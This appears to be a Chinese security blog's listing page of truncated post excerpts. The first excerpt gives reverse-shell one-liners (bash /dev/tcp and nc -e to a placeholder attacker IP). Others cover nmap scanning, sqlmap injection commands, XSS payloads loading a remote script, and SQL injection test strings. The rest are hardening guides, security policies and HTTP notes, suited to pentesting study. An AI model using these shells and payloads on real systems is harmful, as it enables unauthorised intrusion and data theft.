专注企业信息安全－sec

反弹shell0x01 bash 版本：bash -i >& /dev/tcp/attackerip/1234 0>&1注意这个是由解析 shell 的 bash 完成，所以某些情况下不支持。我用 zsh 不能反弹。这个也是最常用的。0x02 nc 版本：支持 - e 选项nc -e /bin/sh attackerip 1234这个方式最...

最好的 NMAP 扫描策略# 适用所有大小网络最好的 nmap 扫描策略# 主机发现，生成存活主机列表$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt# 端口发现，发现大部分常用端口#...

cookie注入：sqlmap.py -u 注入点 --cookie "参数" --tables --level 2POST登录框注入：sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data...

sqlmap简介sqlmap支持五种不同的注入模式：1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。 3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。 4、联合查询注入，可以使用union的情况下的注入。 5、堆查询...

当给sqlmap这么一个url (http://www.target.com/sqlmap/mysql/get_int.php?id=1) 的时候，它会：1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择，读取哪些数据sqlmap支持五种不同的注入模式：1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。2、...

(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javasc...

分享一些平时测试用的sql payloads1：BOOL SQLINJECTION\'"%df'%df"and 1=1and 1=2' and '1'='1' and '1'='2" and "1"="1" and "1"="2) and (1=1) and (1=2') and ('1'='1') and ('1'='2%' and 1=1 and '%'...

转载自：http://www.4hou.com/technology/10481.html还有freebuf系列的文章都挺好https://www.cnblogs.com/MacoLee/articles/5714165.html4种常用的扫描1.nmap -sP 1.1.1.1/24探测C段存活主机，可以用 |grep up 过滤存活的主机2. nmap -sS 1.1....

https://www.cnblogs.com/wintrysec/p/10874980.html1.使用无害的payload，类似<b>,<i>,<u>观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤<>等等；2.如果过滤闭合标签，尝试无闭合标签的payload（<b,<i,<marque...

301永久重定向302临时重定向，HTTP1.0的状态码，HTTP1.1也有保留。 如果client向server发送post请求。 server返回URL和302。 如果用户确认，client发送post请求。（但实际情况是，很多浏览器都不问问用户，直接变为get发送get请求）303临时重定向，HTTP1.1的状态码// 发送Post请求，收到303，直接重定向为get，发送g...

前言：从来没想过要写关于http协议请求方式的，可是今天遇到一位同事，竟然对HTTP的请求方式一点都不了解，所以决定总结一下，也记录一下。 HTTP协议 （Hyper Text Transfer Protocol）HTTP是一个基于TCP/IP通信协议来传递数据，包括html文件、图像、结果等，即是一个客户端和服务器端请求和应答的标准。 HTTP协议特点1.http无连接：...

1.搜狗1）.首先修改依赖源deb http://cn.archive.ubuntu.com/ubuntu/ trusty main restricted universe multiversedeb http://cn.archive.ubuntu.com/ubuntu/ trusty-security main restricted universe multiversedeb htt...

 ESET和NOD32安全产品如果你用的是 ESET 安全产品，比如 NOD32 反病毒软件或 ESET 网络安全，请关闭以下设置，然后再打开该设置——这样也许会有助于消除该故障。启用应用协议内容过滤器 启用 SSL/TLS 协议过滤器...

1.权限控制，低权限，只读2.屏蔽IP，使用一些威胁情报更新自己的IP黑名单列表3.封杀各种user-agent，防止恶意爬虫，漏扫等4.封杀特定的url，入bak，sh，sql等5.强制网站使用域名访问6.url 参数过滤敏感字,如../，union等7.关闭版本号显示8.自定义错误页面，关闭报错信息9.Cookie添加HttpOnly属性10.tomcat可以设置关闭war自...

1.Do 规范1.1 General Security 通用安全条目 执行人 负责人 被访者应确保访客在前台登记访客信息,并在办公区域内需有人全程陪同 前台;相关对接人员 行政跟进 只有在得到IT人员的授权后,访客携带的电脑,手机才能连入公司网络 前台;相关对接技术负责任;运维技术部 行政跟进 公共wifi由IT运维部跟进 工作相关的任...

权限系统保证全部资源都使用HTTPS 登出之后销毁会话ID 密码重置后需要销毁所有活跃会话 使用httponly Cookies 密码找回等无需登录的场景下下达到用户认证字符串必须是该场景单独使用的,须确保无法在其他任何场景完成认证 敏感场景,如下但不限于:登录,注册,发表话题等,是否存在验证码,验证码强度是否足够,验证码接口是否安全,若无验证码,是否有频率限制或其他人机验证方式 ...

安全检查项 推荐工具 Nginx配置安全 gixy Nginx目录权限检查 手工 Apache日志安全检测 apache-scalp PHP配置文件安全检测 pcc 主机安全审计 lynis rootkit木马检查 chkrootkit;rootkit hunter 系统用户排查 手工,注意高权限和无需密码账号 线上代...

前言关于计算机网络，HTTP网络通信协议在任何的开发工作中都非常重要 今天，我将献上一份HTTP的学习指南，希望你们会喜欢目录1. 储备知识讲解HTPP协议前，先了解一些基础的计算机网络相关知识1.1 计算机网络体系结构 定义  计算机网络的各层 + 其协议的集合 作用  定义该计算机网络的所能完成的功能 结构介绍  计算机网络体系结构分为3...